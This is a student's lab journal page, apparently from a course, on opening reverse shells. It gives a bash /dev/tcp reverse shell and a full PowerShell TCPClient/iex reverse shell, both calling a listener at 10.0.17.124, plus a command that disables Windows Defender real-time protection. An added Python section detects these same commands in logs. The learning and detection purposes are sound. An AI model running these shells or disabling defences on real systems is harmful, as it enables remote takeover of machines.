8.2 - JadenGil/Jaden-Tech-Journal GitHub Wiki

Deliverable 1:

When SSHing into my account, I had to use the command:

```bash
/bin/bash -i >& /dev/tcp/10.0.17.124/4449 0>&1
```



Deliverable 2:

Not sure why exactly I couldn't get this working. I am going to continue to troubleshoot, but from what I've read these are the proper steps to follow.



Deliverable 3:

Doing the same thing on Windows is weird, but it works.

First things first: you must ALWAYS RUN AS ADMINISTRATOR, otherwise it will not work.

Make sure that you use the command `Set-MpPreference -DisableRealtimeMonitoring $true`; it will not work otherwise.

Then you want to COPY this command into CMD:

```powershell
powershell -c "$client = New-Object System.Net.Sockets.TCPClient('10.0.17.124',4449); $stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0}; while(($i = $stream.Read($bytes, 0, $bytes.length)) -ne 0){;$data= (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i);$sendback = (iex $data 2>&1 | Out-String);$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
```
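From the defender's side, the three commands used in this lab are exactly the kind of thing command-line telemetry should flag: the `/dev/tcp/` redirect, the Defender real-time monitoring toggle, and a raw `TCPClient` combined with `iex`. The following detection check is an added example written by the editor, not part of this journal or its lab; the log line format, hostnames and usernames are constructed for illustration.

```python
import re
from typing import NamedTuple, Optional

# Constructed sample telemetry (not real logs): one command-line event per line,
# in the shape an EDR or auditd/PowerShell script-block forwarder might emit.
SAMPLE_LOG = [
    'host=web01 user=www-data cmd="/bin/bash -i >& /dev/tcp/10.0.17.124/4449 0>&1"',
    'host=win10 user=lab cmd="powershell -c Set-MpPreference -DisableRealtimeMonitoring $true"',
    'host=win10 user=lab cmd="powershell -c $client = New-Object System.Net.Sockets.TCPClient(\'10.0.17.124\',4449); $sendback = (iex $data 2>&1 | Out-String)"',
    'host=win10 user=dev cmd="powershell -c $c = New-Object System.Net.Sockets.TCPClient(\'10.0.17.50\',8080); $c.Close()"',
    'host=web01 user=ops cmd="/bin/bash -c tar czf /tmp/site.tgz /var/www"',
]
class Finding(NamedTuple):
    host: str
    user: str
    rule: str
    remote: Optional[str]  # "ip:port" when the command names a destination
_IP = r"(\d{1,3}(?:\.\d{1,3}){3})"
RULES = [
    # bash opening a socket through its /dev/tcp pseudo-device with stdio wired to it
    ("bash_dev_tcp_redirect", re.compile(rf"/dev/tcp/{_IP}/(\d{{1,5}})"), None),
    # Defender real-time scanning switched off from the command line
    ("defender_realtime_disabled",
     re.compile(r"Set-MpPreference\s+-DisableRealtimeMonitoring\s+\$true", re.I), None),
    # TCPClient to a literal address plus iex/Invoke-Expression; TCPClient alone is
    # common in legitimate scripts, so the third tuple element must also match to fire
    ("powershell_tcpclient_iex",
     re.compile(rf"TCPClient\(\s*['\"]?{_IP}['\"]?\s*,\s*(\d{{1,5}})", re.I),
     re.compile(r"\b(iex|Invoke-Expression)\b", re.I)),
]
_EVENT = re.compile(r'host=(\S+) user=(\S+) cmd="(.*)"$')
def scan(lines):
    """Return one Finding per (event, matching rule); malformed lines are skipped."""
    findings = []
    for line in lines:
        m = _EVENT.match(line)
        if not m:
            continue
        host, user, cmd = m.groups()
        for name, pattern, also in RULES:
            hit = pattern.search(cmd)
            if not hit or (also and not also.search(cmd)):
                continue
            remote = f"{hit.group(1)}:{hit.group(2)}" if hit.groups() else None
            findings.append(Finding(host, user, name, remote))
    return findings
def remote_endpoints(findings):
    """Distinct ip:port destinations, for pivoting into firewall or NetFlow logs."""
    return {f.remote for f in findings if f.remote}
```

Running `scan(SAMPLE_LOG)` yields three findings (one per lab command) and nothing for the benign TCPClient or tar lines; the Defender toggle carries no remote endpoint, so `remote_endpoints` returns only the listener address to correlate against network logs.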



This lab was a little confusing. It seemed like not all the steps would always work the way they should, but it acted as a good learning experience if nothing else. It did help me a lot to understand how a person can use a PHP script to open a backdoor on a target of their choice (so long as that target has poor security like this one did).